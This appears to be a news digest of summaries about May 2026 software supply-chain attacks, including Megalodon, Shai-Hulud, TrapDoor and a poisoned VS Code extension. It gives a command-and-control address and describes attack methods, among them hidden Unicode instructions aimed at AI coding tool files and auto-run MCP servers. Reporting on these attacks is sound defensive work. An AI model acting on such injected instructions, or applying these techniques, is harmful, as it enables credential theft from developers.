Worming Through Dev Toolchains: Supply‑Chain Crisis

Ionut Arghire / SecurityWeek : More than 5,500 GitHub repositories were infected with malware in a supply chain attack, dubbed Megalodon, on May 18 that relies on automated commits — Fake automated commits injected GitHub Actions workflows containing payloads to steal credentials, CI secrets, keys, and tokens.

The Chinese National Cybersecurity Reporting Center warned that npm, the leading JavaScript package registry, was hit by a supply-chain poisoning campaign dubbed “Shai-Hulud.” Attackers compromised npm maintainer accounts and pushed hundreds of malicious package versions across more than 300 packages, enabling worm-like propagation. Malicious installers execute on developer machines and CI/CD environments to exfiltrate GitHub and npm tokens, cloud keys, SSH keys, Kubernetes credentials and DB strings, then reuse stolen npm publish rights to backdoor additional packages. Affected projects include echarts-for-react, multiple @antv libraries, 42 TanStack packages, Mistral AI PyPI packages and timeago.js. Authorities advised isolating infected hosts, auditing lockfiles and install scripts, cleaning leftover artifacts, rotating credentials and tightening dependency vetting.

Security researchers have identified a supply-chain campaign called “TrapDoor” that distributed malicious packages to npm, PyPI, and Crates.io to steal developer credentials and sensitive data. The packages attempted to exfiltrate AWS keys, GitHub tokens, SSH keys, browser data, and crypto-wallet information from developer machines and environments. Unusually, some payloads used hidden Unicode instructions to target AI workflow artifacts and files such as .cursorrules and CLAUDE.md, suggesting the attackers aimed to exploit emerging AI toolchains and prompt repositories. This matters because package-ecosystem compromises can rapidly affect many projects and infrastructure, highlighting ongoing risks in open-source dependencies and the need for stronger supply-chain protections.

A GitHub breach discovered in May 2026 compromised several popular developer extensions — notably NX Console, multiple VS Code integrations, and TeamPCP — by injecting malicious code into repositories and releases. The incident exposes a harmful software supply-chain vector affecting developers who install or update these extensions, potentially enabling backdoors, credential theft, or further propagation. GitHub and affected maintainers are investigating and issuing advisories and mitigations; users are urged to audit installations, rotate credentials, and verify checksums and provenance for extension packages. The episode underscores persistent risks in dependency management and the need for stronger supply-chain protections, code integrity checks, and developer-security hygiene.

Node.js projects face growing risk from npm supply-chain attacks and RCE vectors that hide in trusted dependencies, typosquatted packages, malicious install scripts, or dependency confusion. The article gives practical, CI-focused defenses: always commit lockfiles and use npm ci for reproducible installs; pin exact dependency versions and rely on automated PR tools (Dependabot/Renovate) for controlled updates; adopt a 30-day delay before consuming new releases so community scrutiny can surface malicious packages; and disable npm lifecycle scripts (ignore-scripts=true) to block postinstall/backdoor execution. Combined with pipeline guards, these steps reduce the chance a compromised package executes in production.

Researchers uncovered an automated campaign called Megalodon that injected malicious commits into over 5,500 GitHub repositories, pushing CI/CD credential-stealing malware that exfiltrates AWS, GCP, and Azure credentials, SSH keys, Docker/Kubernetes configs, Vault and Terraform tokens, and GitHub/Bitbucket tokens. SafeDep traced the compromise to poisoned source in a legitimate npm package (Tiledesk versions 2.18.6–2.18.12) published by a maintainer who unknowingly pushed backdoored code after the repository itself was compromised. Ox Security researcher Moshe Siman Tov Bustan warns this represents a new era of supply-chain attacks and urges platform vendors like GitHub and npm to do more to stop malicious code reaching servers. Analysts say Megalodon appears distinct from TeamPCP despite behavioral overlap.

Security researchers uncovered 'Megalodon,' an automated campaign that pushed malicious commits into at least 5,561 GitHub repositories to steal CI/CD and cloud credentials. SafeDep and Ox Security traced the injected code — sometimes published into npm packages like Tiledesk — to commits that, if merged, execute inside CI/CD pipelines to exfiltrate AWS, GCP, and Azure credentials, SSH keys, Docker/Kubernetes configs, Vault and Terraform secrets, and GitHub/Bitbucket tokens. Investigators say Megalodon resembles earlier TeamPCP supply-chain attacks but is likely a distinct actor copying tactics. Researchers warn the wave highlights systemic risks in open-source supply chains and call for stronger platform-side protections from GitHub, npm, and others to block malicious code before it reaches repositories.

Security researchers uncovered the “Megalodon” campaign that backdoored more than 5,000 GitHub repositories by abusing GitHub Actions workflows. Attackers used throwaway or compromised accounts and weak branch protections to inject malicious CI steps that download and run infostealer malware from external URLs, turning supply-chain automation into a mass distribution vector. OX Security and SafeDep led analysis, highlighting how automated CI/CD environments, token permissions, and insufficient repository safeguards allowed rapid propagation. The incident matters because it shows how modern development workflows and ephemeral contributor accounts can be weaponized to exfiltrate secrets and compromise developer and enterprise infrastructure, prompting urgent need for stricter branch policies, least-privilege tokens, and CI workflow auditing.

Security researchers disclosed a supply-chain campaign called “Megaladon” that has compromised over 5,500 GitHub repositories by injecting malicious code into open-source projects and package manifests. The campaign leverages compromised accounts, credential stuffing, and repo takeover to introduce backdoors and typosquatted dependencies, enabling downstream supply-chain contamination across npm, PyPI and other ecosystems. Major risks include silent propagation to downstream projects, automated CI/CD workflows pulling poisoned packages, and credential exposure via leaked tokens. This matters because it undermines open-source trust, threatens millions of users/deployments relying on affected libraries, and highlights gaps in repository access controls, dependency verification, and package registry protections. Mitigations include rotating credentials, enforcing 2FA, dependency pinning and supply-chain scanning.

Security researchers disclosed a large-scale supply-chain attack on GitHub, dubbed "Megalodon," that compromised over 5,500 repositories by injecting malicious code into open-source packages and projects. The campaign exploited compromised accounts and package publishing workflows to push backdoored updates that could exfiltrate credentials or run arbitrary commands. Affected projects span multiple languages and ecosystems, increasing risk for downstream users and dependent software. GitHub and maintainers are urged to rotate credentials, audit recent commits and package releases, and enforce multi-factor authentication and signed commits/packages. The incident highlights persistent threats to the software supply chain and the need for stronger repository hygiene, dependency monitoring, and platform-level protections.

On May 18–19 attackers used stolen maintainer credentials to publish hundreds of malicious npm package versions that passed Sigstore provenance checks because the adversary could obtain valid signing certificates. The Mini Shai-Hulud campaign (attributed to TeamPCP) and a separate compromise of the Nx Console VS Code extension led to thousands of installs and harvesting of cloud credentials, tokens, and 1Password vaults. Researchers from Endor Labs, Socket, StepSecurity, Adversa AI, Johns Hopkins, Microsoft MSRC and others say the developer-tool verification model is broken: CI, Sigstore, IDE/extension credential storage, agent frameworks, and AI coding CLIs all expose attack surfaces. Notably, TrustFall showed AI coding CLIs auto-execute project MCP servers with full privileges, enabling secret exfiltration and supply-chain propagation.

A cybercriminal group called TeamPCP has escalated software supply-chain attacks into a persistent campaign, recently breaching GitHub after a developer installed a malicious VSCode extension and claiming access to roughly 3,800–4,000 internal repositories. Security firms say TeamPCP has executed about 20 waves of attacks in months, tainting 500+ distinct open-source projects and using infected developer tools to steal credentials, publish malicious packages, and later extort victims. The group reportedly automates propagation with a self-spreading worm dubbed Mini Shai-Hulud that creates repositories with stolen encrypted credentials, accelerating a self-perpetuating “flywheel” of compromises across developer ecosystems. The spree heightens systemic risk for software supply chains and developer trust.

GitHub confirmed a major software supply-chain breach after attackers from the criminal group TeamPCP used a poisoned VSCode extension to access roughly 3,800–4,000 internal repositories and posted stolen source code for sale. Security firms say TeamPCP has run an unprecedented, sustained campaign—about 20 waves in recent months—tainting more than 500 distinct open-source packages and using planted malware to steal credentials, publish backdoored releases, and breach downstream companies including OpenAI and Mercor. Analysts warn TeamPCP automated much of the campaign with a self-spreading worm (Mini Shai-Hulud), creating a repeatable “flywheel” that amplifies supply-chain compromise risk across developer toolchains and critical software infrastructure.

Megalodon: Mass GitHub Repo Backdooring via CI Workflows

New guidance urges JavaScript developers to switch from npm to pnpm to reduce supply-chain risk and improve performance. The recommendation, highlighted in a blog post and shared on Reddit, argues pnpm’s strict node_modules layout, deterministic lockfile handling and stricter dependency resolution lower exploit surface and accidental package hoarding. It notes pnpm’s faster installs and disk-space savings as operational benefits, and warns that npm’s looser hoisting and flat dependency model can enable malicious packages and make attacks harder to contain. The piece matters because package manager choice affects millions of Node.js projects and can materially improve security posture and developer productivity with relatively low migration effort.

Mitchell Hashimoto, a longtime GitHub user, publicly announced he's leaving after repeated GitHub outages and reliability issues, amplifying wider developer discontent as major customers and OpenAI explore alternatives. Recent crises include a May 21st breach where a poisoned VS Code extension exposed credentials and led to 3,800+ internal repositories being compromised and offered for sale, plus a disclosed 0-day in Git infrastructure. Internal upheaval followed Microsoft reorganizing GitHub under CoreAI, removing the CEO role and triggering executive departures. Competition from Cursor and Claude Code, rising Copilot costs and unsustainable AI inference expenses, and migration projects to Azure that caused downtime have worsened trust. The story matters because GitHub's stability, security and business model affect the global developer ecosystem and Microsoft’s cloud margins.

A widely used JavaScript template package, art-template, was confirmed as the latest victim of a supply-chain attack on the npm ecosystem, where attackers have controlled the repository since 2025 and injected unauthorized remote JavaScript (including calls to Baidu Analytics). Developers and sysadmins raced to assess exposure across projects that pull dependencies via npm, which the article argues is the dominant vector for such incidents. Users quoted describe a sense of helplessness and point to weak maintainer account security as a root cause; the breach underscores ongoing risks in package-manager distributed dependencies and the need for stronger supply-chain practices. Upstream art-template documentation has been published with details.

On May 18, 2026, a campaign dubbed Megalodon pushed 5,718 malicious commits to 5,561 GitHub repositories in six hours, injecting GitHub Actions workflows that exfiltrate CI secrets, cloud credentials, SSH keys, OIDC tokens and source code artifacts to a C2 at 216.126.225.129:8443. The attacker used throwaway accounts and forged identities (build-bot, auto-ci, ci-bot, pipeline-bot) and deployed two variants: a mass SysDiag workflow that triggers on push and pull_request_target, and a targeted Optimize-Build variant that replaces workflows and exposes a workflow_dispatch backdoor. The campaign also propagated via the npm package @tiledesk/tiledesk-server (v2.18.6–2.18.12). This matters because CI workflow compromise allows large-scale credential theft and cloud identity impersonation, threatening downstream supply chains and cloud environments.